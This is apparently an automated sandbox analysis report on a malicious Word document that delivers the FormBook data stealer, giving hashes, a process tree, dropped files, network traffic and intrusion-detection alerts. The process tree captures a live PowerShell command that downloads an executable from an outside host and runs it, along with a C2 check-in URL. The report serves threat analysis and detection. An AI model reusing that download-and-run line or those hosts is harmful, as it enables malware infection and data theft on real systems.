File name: | bd1ea5a86228a93a63041dbb1b7336b34dc27828e1da86d570dec1eaf80418a5.doc |
Full analysis: | https://app.any.run/tasks/35f1eb4c-891c-4d38-a44d-17ac86d0b03b |
Verdict: | Malicious activity |
Threats: | FormBook is a data stealer that is being distributed as a MaaS. FormBook differs from a lot of competing malware by its extreme ease of use that allows even the unexperienced threat actors to use FormBook virus. |
Analysis date: | March 21, 2019, 03:18:30 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: HP PC, Template: Order#0281-17pallet.doc, Last Saved By: HP PC, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Wed Mar 20 08:57:00 2019, Last Saved Time/Date: Wed Mar 20 08:57:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
MD5: | 9AFDF05DC6FB614E5C37BAFA0351E785 |
SHA1: | 08CC487B7C0DBA442F3FD035569602E30EF3824F |
SHA256: | BD1EA5A86228A93A63041DBB1B7336B34DC27828E1DA86D570DEC1EAF80418A5 |
SSDEEP: | 6144:tNxvZS3Y/r5E0BLLY5iAB5pxDytvuKTe6dp41H285QutY5WeCJK5b:tXvsOr5rL+iAzGWap41H285QutY5WeC0 |
.doc | | | Microsoft Word document (80) |
---|
CompObjUserType: | Microsoft Office Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 39 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 12 |
CharCountWithSpaces: | 1 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 1 |
Words: | - |
Pages: | 1 |
ModifyDate: | 2019:03:20 08:57:00 |
CreateDate: | 2019:03:20 08:57:00 |
TotalEditTime: | 1.0 minutes |
Software: | Microsoft Office Word |
RevisionNumber: | 2 |
LastModifiedBy: | HP PC |
Template: | Order#0281-17pallet.doc |
Author: | HP PC |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1844 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\bd1ea5a86228a93a63041dbb1b7336b34dc27828e1da86d570dec1eaf80418a5.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
2456 | cmd /c POwErshEll(New-Object System.Net.WebClient).DownloadFile('http://prescient-inc.com/top/Lesth.exe','%temp%\ffydhvne.exe');start %temp%\ffydhvne.exe | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1548 | POwErshEll (New-Object System.Net.WebClient).DownloadFile('http://prescient-inc.com/top/Lesth.exe','C:\Users\admin\AppData\Local\Temp\ffydhvne.exe');start C:\Users\admin\AppData\Local\Temp\ffydhvne.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3432 | "C:\Users\admin\AppData\Local\Temp\ffydhvne.exe" | C:\Users\admin\AppData\Local\Temp\ffydhvne.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Description: ChildDlgTest MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
2856 | "C:\Windows\System32\cmd.exe" | C:\Windows\System32\cmd.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
4072 | /c del "C:\Users\admin\AppData\Local\Temp\ffydhvne.exe" | C:\Windows\System32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1696 | C:\Windows\Explorer.EXE | C:\Windows\explorer.exe | — | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2128 | C:\Windows\system32\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09} | C:\Windows\system32\DllHost.exe | svchost.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: COM Surrogate Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2620 | "C:\Program Files\Ox4ax6tth\userc8t.exe" | C:\Program Files\Ox4ax6tth\userc8t.exe | — | explorer.exe |
User: admin Integrity Level: MEDIUM Description: ChildDlgTest MFC Application Version: 1, 0, 0, 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
1844 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9AC0.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1548 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2OYTG81VQGYU3OX1Y9EB.temp | — | |
MD5:— | SHA256:— | |||
1844 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF1A827AA7850534A9.TMP | — | |
MD5:— | SHA256:— | |||
1844 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5704C60F-F484-40D6-BE50-EE0A302842AE}.tmp | — | |
MD5:— | SHA256:— | |||
1844 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{5F64299C-84A5-4683-AE57-5A4617D39C15}.tmp | — | |
MD5:— | SHA256:— | |||
1548 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:7100C9D54A32DFE02751A9E1BC41F804 | SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C | |||
1548 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFfac06.TMP | binary | |
MD5:7100C9D54A32DFE02751A9E1BC41F804 | SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C | |||
2856 | cmd.exe | C:\Users\admin\AppData\Roaming\O3-9N7-E\O3-logrc.ini | binary | |
MD5:2855A82ECDD565B4D957EC2EE05AED26 | SHA256:88E38DA5B12DD96AFD9DC90C79929EC31D8604B1AFDEBDD5A02B19249C08C939 | |||
1844 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:A3D37A96BE99E1B37F142EAB31105E77 | SHA256:10776DED098C89C43628A733533878C3854AA3666210F1501E5D0D74311EF8F0 | |||
1548 | powershell.exe | C:\Users\admin\AppData\Local\Temp\ffydhvne.exe | executable | |
MD5:7DDA33F6D9FC6FFDE00B21D97BB5644C | SHA256:2B5B2B7A6F2BAD9D2C68F51E3DF54947863227E0DA2BB908CBBA196C9D8AC69B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1696 | explorer.exe | GET | 301 | 104.28.28.142:80 | http://www.taraftarium241.com/ma/?9rr=ozra198NBRIZr0gm3yaAtsQlOeCRG4e+mJua2MSt8bjGVmJ3SAyL8rTM28eLXyqALa53ug==&Otcl=wZ10dx48cnyhHRd | US | html | 343 b | shared |
1548 | powershell.exe | GET | 200 | 103.21.59.25:80 | http://prescient-inc.com/top/Lesth.exe | IN | executable | 440 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1696 | explorer.exe | 104.28.28.142:80 | www.taraftarium241.com | Cloudflare Inc | US | shared |
1548 | powershell.exe | 103.21.59.25:80 | prescient-inc.com | PDR | IN | malicious |
Domain | IP | Reputation |
---|---|---|
prescient-inc.com |
| suspicious |
www.taraftarium241.com |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
1548 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
1548 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
1696 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (GET) |